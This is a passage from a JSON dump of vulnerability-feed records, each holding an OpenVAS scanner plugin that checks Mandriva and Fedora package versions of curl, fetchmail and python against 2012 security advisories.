NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64curl4\", rpm:\"lib64curl4~7.20.1~2.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64curl-devel\", rpm:\"lib64curl-devel~7.20.1~2.2mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-06T13:06:41", "description": "Check for the Version of fetchmail", "cvss3": {}, "published": "2012-09-04T00:00:00", "type": "openvas", "title": "Mandriva Update for fetchmail MDVSA-2012:149 (fetchmail)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3482", "CVE-2011-3389"], "modified": "2018-01-05T00:00:00", "id": "OPENVAS:831731", "href": "http://plugins.openvas.org/nasl.php?oid=831731", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for fetchmail MDVSA-2012:149 (fetchmail)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in fetchmail:\n\n Fetchmail version 6.3.9 enabled all SSL workarounds (SSL_OP_ALL) which\n contains a switch to disable a countermeasure against certain attacks\n against block ciphers that permit guessing the initialization vectors,\n providing that an attacker can make the application (fetchmail) encrypt\n some data for him -- which is not easily the case (aka a BEAST attack)\n (CVE-2011-3389).\n\n A denial of service flaw was found in the way Fetchmail, a remote mail\n retrieval and forwarding utility, performed base64 decoding of certain\n NTLM server responses. Upon sending the NTLM authentication request,\n Fetchmail did not check if the received response was actually part\n of NTLM protocol exchange, or server-side error message and session\n abort. A rogue NTML server could use this flaw to cause fetchmail\n executable crash (CVE-2012-3482).\n\n This advisory provides the latest version of fetchmail (6.3.22)\n which is not vulnerable to these issues.\";\n\ntag_affected = \"fetchmail on Mandriva Linux 2011.0,\n Mandriva Enterprise Server 5.2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www.mandriva.com/en/support/security/advisories/?name=MDVSA-2012:149\");\n script_id(831731);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-04 11:39:57 +0530 (Tue, 04 Sep 2012)\");\n script_cve_id(\"CVE-2011-3389\", \"CVE-2012-3482\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:P\");\n script_xref(name: \"MDVSA\", value: \"2012:149\");\n script_name(\"Mandriva Update for fetchmail MDVSA-2012:149 (fetchmail)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of fetchmail\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2011.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"fetchmail\", rpm:\"fetchmail~6.3.22~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fetchmailconf\", rpm:\"fetchmailconf~6.3.22~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fetchmail-daemon\", rpm:\"fetchmail-daemon~6.3.22~0.1\", rls:\"MNDK_2011.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"fetchmail\", rpm:\"fetchmail~6.3.22~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fetchmailconf\", rpm:\"fetchmailconf~6.3.22~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"fetchmail-daemon\", rpm:\"fetchmail-daemon~6.3.22~0.1mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-06T13:06:24", "description": "Check for the Version of python", "cvss3": {}, "published": "2012-05-08T00:00:00", "type": "openvas", "title": "Fedora Update for python FEDORA-2012-5924", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1150", "CVE-2011-3389", "CVE-2012-0845"], "modified": "2018-01-04T00:00:00", "id": "OPENVAS:864218", "href": "http://plugins.openvas.org/nasl.php?oid=864218", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2012-5924\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Python is an interpreted, interactive, object-oriented programming\n language often compared to Tcl, Perl, Scheme or Java. Python includes\n modules, classes, exceptions, very high level dynamic data types and\n dynamic typing. Python supports interfaces to many system calls and\n libraries, as well as to various windowing systems (X11, Motif, Tk,\n Mac and MFC).\n\n Programmers can write new built-in modules for Python in C or C++.\n Python can be used as an extension language for applications that need\n a programmable interface.\n\n Note that documentation for Python is provided in the python-docs\n package.\n\n This package provides the "python" executable; most of the actual\n implementation is within the "python-libs" package.\";\n\ntag_affected = \"python on Fedora 16\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/079978.html\");\n script_id(864218);\n script_version(\"$Revision: 8285 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 07:29:16 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-08 12:34:52 +0530 (Tue, 08 May 2012)\");\n script_cve_id(\"CVE-2012-1150\", \"CVE-2012-0845\", \"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-5924\");\n script_name(\"Fedora Update for python FEDORA-2012-5924\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of python\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.3~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-05-08T00:00:00", "type": "openvas", "title": "Fedora Update for python-docs FEDORA-2012-5924", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1150", "CVE-2011-3389", "CVE-2012-0845"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864223", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864223", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python-docs FEDORA-2012-5924\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/079979.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864223\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-08 12:35:11 +0530 (Tue, 08 May 2012)\");\n script_cve_id(\"CVE-2012-1150\", \"CVE-2012-0845\", \"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-5924\");\n script_name(\"Fedora Update for python-docs FEDORA-2012-5924\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python-docs'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"python-docs on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"python-docs\", rpm:\"python-docs~2.7.3~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2018-01-11T11:07:17", "description": "Check for the Version of python3", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2012-5785", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1150", "CVE-2011-3389", "CVE-2012-0845"], "modified": "2018-01-10T00:00:00", "id": "OPENVAS:864317", "href": "http://plugins.openvas.org/nasl.php?oid=864317", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2012-5785\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"python3 on Fedora 17\";\ntag_insight = \"Python 3 is a new version of the language that is incompatible with the 2.x\n line of releases. The language is mostly the same, but many details, especially\n how built-in objects like dictionaries and strings work, have changed\n considerably, and a lot of deprecated features have finally been removed.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080066.html\");\n script_id(864317);\n script_version(\"$Revision: 8352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 08:01:57 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:02:10 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-1150\", \"CVE-2012-0845\", \"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2012-5785\");\n script_name(\"Fedora Update for python3 FEDORA-2012-5785\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of python3\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.2.3~5.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:39", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for python-docs FEDORA-2012-5892", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1150", "CVE-2011-3389", "CVE-2012-0845"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864392", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864392", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python-docs FEDORA-2012-5892\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/079569.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864392\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:07:36 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-1150\", \"CVE-2012-0845\", \"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-5892\");\n script_name(\"Fedora Update for python-docs FEDORA-2012-5892\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python-docs'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"python-docs on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"python-docs\", rpm:\"python-docs~2.7.3~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:43", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-05-04T00:00:00", "type": "openvas", "title": "Fedora Update for python3 FEDORA-2012-5916", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1150", "CVE-2011-3389", "CVE-2012-0845"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864199", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864199", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python3 FEDORA-2012-5916\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/079698.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864199\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-04 10:45:29 +0530 (Fri, 04 May 2012)\");\n script_cve_id(\"CVE-2012-1150\", \"CVE-2012-0845\", \"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-5916\");\n script_name(\"Fedora Update for python3 FEDORA-2012-5916\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python3'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"python3 on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"python3\", rpm:\"python3~3.2.3~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:54", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-05-08T00:00:00", "type": "openvas", "title": "Fedora Update for python FEDORA-2012-5924", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1150", "CVE-2011-3389", "CVE-2012-0845"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864218", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864218", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2012-5924\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/079978.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864218\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-08 12:34:52 +0530 (Tue, 08 May 2012)\");\n script_cve_id(\"CVE-2012-1150\", \"CVE-2012-0845\", \"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-5924\");\n script_name(\"Fedora Update for python FEDORA-2012-5924\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"python on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.3~1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "Fedora Update for python FEDORA-2012-5892", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1150", "CVE-2011-3389", "CVE-2012-0845"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864384", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864384", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2012-5892\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/079570.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864384\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 10:06:37 +0530 (Thu, 30 Aug 2012)\");\n script_cve_id(\"CVE-2012-1150\", \"CVE-2012-0845\", \"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name:\"FEDORA\", value:\"2012-5892\");\n script_name(\"Fedora Update for python FEDORA-2012-5892\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"python on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.3~3.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, 